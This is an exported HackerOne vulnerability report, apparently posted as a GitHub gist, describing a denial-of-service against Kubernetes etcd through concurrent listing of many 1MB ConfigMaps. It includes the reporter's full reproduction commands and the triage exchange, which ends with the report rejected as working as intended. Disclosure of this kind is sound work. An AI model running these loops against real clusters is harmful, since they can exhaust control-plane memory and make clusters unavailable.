Skip to content

Instantly share code, notes, and snippets.

@dlipovetsky
Last active December 15, 2021 05:36
Show Gist options
  • Save dlipovetsky/9cd00f4d36205f160a8711fa7423e0ca to your computer and use it in GitHub Desktop.
Save dlipovetsky/9cd00f4d36205f160a8711fa7423e0ca to your computer and use it in GitHub Desktop.
Report -- NOT ACCEPTED -- on potential Denial of Service to the Kubernetes Security Team.

Notes:

  • The report was not accepted. I intend to file a public issue, but haven't yet.
  • Kubernetes asks for reports to be submitted through https://hackerone.com. That's where I submitted the report. This is an export of the report

Title: Concurrent list requests of many, large Kubernetes resources cause etcd members to exhaust almost all available memory Scope: https://github.com/kubernetes/kubernetes Weakness: Denial of Service Severity: Medium (6.5) Link: /reports/1058775 Date: 2020-12-14 21:20:50 +0000 By: @dlipovetsky CVE IDs:

Details:

Summary:

In a Kubernetes cluster deployed with the default configuration, a user that can create and list large (e.g. 1MB) resources (e.g. ConfigMaps) can cause one or more etcd members to exhaust almost all available memory of the host, causing one or more control plane replicas to become unavailable. Although the kernel OOM-kills multiple processes, including etcd, in my experiments, affected control plane replicas needed to be restarted to become available.

Moreover, any client (e.g. a controller) that watches said resources may exhaust its available (e.g. restricted by a quota) memory when synchronizing its cache.

As the available memory of each control plane replica increases, so does the number of resources that must be created, and the number of concurrent list queries required to make reproduce this vulnerability. For 3 control plane replicas, each with 16GB system memory, 200 1MB ConfigMaps, and 100 concurrent list requests should be sufficient. I have not yet looked for an upper bound of either the number of resources or concurrent list requests.

In v1.20, API Priority and Fairness is enabled by default. It has had no effect on my experiments; although some of the concurrent list requests are throttled, etcd still exhausts available memory. To be fair, I have not changed the default configuration.

I have also replicated these experiments with Secrets (which, unlike ConfigMaps, can be larger than 1MB). Other resources may also work.

Kubernetes Version:

v1.20.0 v1.19.x v1.18.x

Component Version:

etcd v3.4.13 etcd v3.4.3

Steps To Reproduce:

  1. Deploy a Kubernetes cluster with the default configuration. I used kubeadm on an Ubuntu 20.04 VM.

  2. Create role and rolebinding for system:serviceaccount:default:default

USER="system:serviceaccount:default:default"
kubectl create role configmap-readwriter --verb=create,list --resource=configmap
kubectl create rolebinding default-configmap-readwriter --user "$USER" --role configmap-readwriter
  1. Create kubeconfig context for "system:serviceaccount:default:default" and cluster "kubernetes" Note: You may need to change the CLUSTERNAME value.
CLUSTERNAME=kubernetes
TOKENNAME="$(kubectl get serviceaccount/default -o jsonpath='{.secrets[0].name}')"
TOKEN="$(kubectl get secret $TOKENNAME -o=jsonpath='{.data.token}' | base64 --decode)"
kubectl config set-credentials default-sa --token="$TOKEN"
kubectl config set-context default-sa --user=default-sa --cluster="$CLUSTERNAME"
  1. (Optional) Verify the limited privileges
kubectl config use-context default-sa
kubectl auth can-i --list
  1. (Optional) Observe the available memory on one or more control plane replicas For example, use watch "free -h".

  2. Using the context from Step 2, create 200 ConfigMaps, 1MB each, in the default namespace

    kubectl config use-context default-sa
    cat > cm.yaml<<EOF
    apiVersion: v1
    kind: ConfigMap
    metadata:
      generateName: payload-
    data:
      payload: $(base64 --wrap=0 /dev/urandom | head -c 1024768)
    EOF
    for i in {1..200}; do kubectl create -f cm.yaml; done
  3. Using the context from Step 2, list all ConfigMaps in the default namespace, 100 times, concurrently

kubectl config use-context default-sa
for i in {1..100}; do kubectl get configmaps & done

Supporting Material/References:

Exhausting available memory while responding to list queries seems to be a known issue for etcd: etcd-io/etcd#12457 (comment). There is a proposal to add a QoS mechanism to protect etcd from its clients.

Impact

An attack could make the cluster control plane unavailable. It could also cause other API clients (e.g. controllers) to exhaust their available memory.

Timeline: 2020-12-14 21:23:37 +0000: @dlipovetsky (comment) This is my first time estimating CVE severity. My coworkers reviewed my report, and had no objections, but I take responsibility, and apologize, if the severity is incorrect.


2020-12-15 11:35:06 +0000: @turtle_shell (bug triaged) Hello @dlipovetsky,

Thank you for your submission! We were able to validate your report, and have submitted it to the appropriate remediation team for review. They will let us know the final ruling on this report, and when/if a fix will be implemented. Please note that the status and severity are subject to change.

Regards, @turtle_shell


2020-12-15 11:41:34 +0000: @turtle_shell (report severity updated)


2020-12-15 16:58:24 +0000: @dlipovetsky (comment) Thanks for triaging this, and the update, @turtle_shell.

I realize that this issue might be seen as a failure to "tuning the control plane for the appropriate scale," but I suspect that the attack works at any scale, though I admit I have not tested this exhaustively.


2020-12-16 17:30:31 +0000: @dlipovetsky (comment)

There is a proposal to add a QoS mechanism to protect etcd from its clients. I misunderstood this proposal. It's more about fairness, and I don't think it will address the issue I'm reporting.


2020-12-18 22:40:25 +0000: @tallclair (bug informative) I've reviewed this issue with several of the kubernetes API machinery leads, and we've concluded that this is largely working as intended. Existing mitigations include:

  1. we don't allow anonymous users to do this
  2. resourcequota can be used to limit how many configmaps can exist in a namespace
  3. the audit logs let you find which user is abusing you
  4. naughty, non-anonymous users can be handled out of band
  5. naughty, non-anonymous users that aren't constrained by quota can do all sorts of bad things to your cluster

Furthermore, there are known scalability issues with list requests, but those are being handled as scalability and performance bugs, not as security issues.

If you are not satisfied with these mitigations, I encourage you to file a public issue or raise the concerns with SIG API Machinery


2020-12-18 22:40:51 +0000: @tallclair (agreed on going public)


2020-12-19 00:08:46 +0000: @dlipovetsky (comment) Thanks for reviewing, and the feedback, @tallclair.

I'll take some time to see whether I can reproduce this taking namespace resource quotas into account.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment